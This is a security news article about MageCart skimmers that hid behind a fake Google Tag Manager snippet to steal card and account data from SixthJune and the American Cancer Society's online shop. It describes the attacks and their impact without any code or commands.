Digital payment skimmer group is found targeting Cancer.org and SixthJune.com customer credit card data
Multiple security researchers revealed new MageCart payment skimmer attacks posing serious risk to their customers. It seems that the French online fashion store SixthJune and the shopping site of the American Cancer Society got hit around the same time. However, reports about the attack came to the public only a few days after the same news about a popular skincare brand First Aid Beauty appeared.
These attacks have mainly been called MageCart skimmers because the initial technique involves the Magento e-commerce platform. The malicious process focuses on infecting the site with a code that allows stealing payment card information from the person at the checkout.
The security researcher Jenkins was the first who mentioned the Sixth June hack in his Twitter post. However, almost at the same time another expert discovered a similar attack using a malicious code planted into the e-store that belongs to the American Cancer Society.
According to researchers, the malicious component got hidden via fake Google Tag Manager snippet. This tool allows owners to handle and deploy marketing tags without having to change the source code. All sites that got compromised showed variants of this fake snippet, although the hosts were different. Willem de Groot stated:
The Cancer.org skimmer loader hides itself by hiding behind the (legitimate) GoogleTagManager code. It searches for “checkout” and will then load the actual skimming code.
A rapid spike in such activities shows that e-skimmers continue to pose a danger
Unfortunately, these sites are not the first victims. However, various researchers who have already investigated MageCart scripts reported that, even after notifying founders and companies that their services got hacked, they were surprised by the lack of response. In most cases, these malicious scripts continued to run even when the researchers notified companies multiple times. The particular incident with Sixth June was spotted during the bigger investigation that uncovered more than 80 different sites showing similar behavior.
Hackers can purchase anything under the name of the cardholder
Reports after analyzed payloads show more specific details about the information that MageCart collects and uses after the attack. The information which can be obtained that is needed to make online purchases:
- name printed on the card;
- expiration date;
- card number;
- the CVV security number on the back of the card.
Nevertheless, data like email addresses, usernames, passwords, physical addresses, and phone numbers can also get stolen from particular accounts during the attack. When the criminal obtains such information, he can log into any account and reroute the order to any other places. MageCart started to work in global promotions two years ago and later on targeted companies like OXO and Newegg.